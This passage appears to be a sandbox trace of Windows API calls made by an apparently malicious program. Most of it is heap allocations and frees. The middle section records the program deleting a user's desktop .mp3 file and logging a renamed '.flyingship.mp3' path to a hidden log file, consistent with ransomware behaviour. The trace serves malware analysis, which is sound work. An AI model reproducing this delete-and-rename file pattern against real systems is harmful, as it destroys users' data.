dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.414] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.415] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\urxyj_reg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0162.416] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.416] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.416] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0162.416] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.416] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.418] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.418] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.418] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.418] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.418] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0162.418] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.418] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.419] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFilePart=0x0) returned 0x48 [0162.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x63c3d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0x90af58 [0162.438] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\urxyj_reg.mp3")) returned 1 [0162.441] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x63c3d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0 [0162.441] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.441] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.442] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.442] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.442] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.444] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.444] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0162.444] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.444] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0162.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0162.445] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x83a, lpOverlapped=0x0) returned 1 [0162.445] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x83a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0162.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\n", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0162.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x56) returned 0x8c4a48 [0162.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\n", cchWideChar=86, lpMultiByteStr=0x8c4a48, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 86 [0162.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0162.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0162.446] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x55, lpOverlapped=0x0) returned 1 [0162.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0162.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.446] CloseHandle (hObject=0x120) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0162.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0162.450] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0162.450] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.451] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0162.451] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.452] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.452] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0162.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 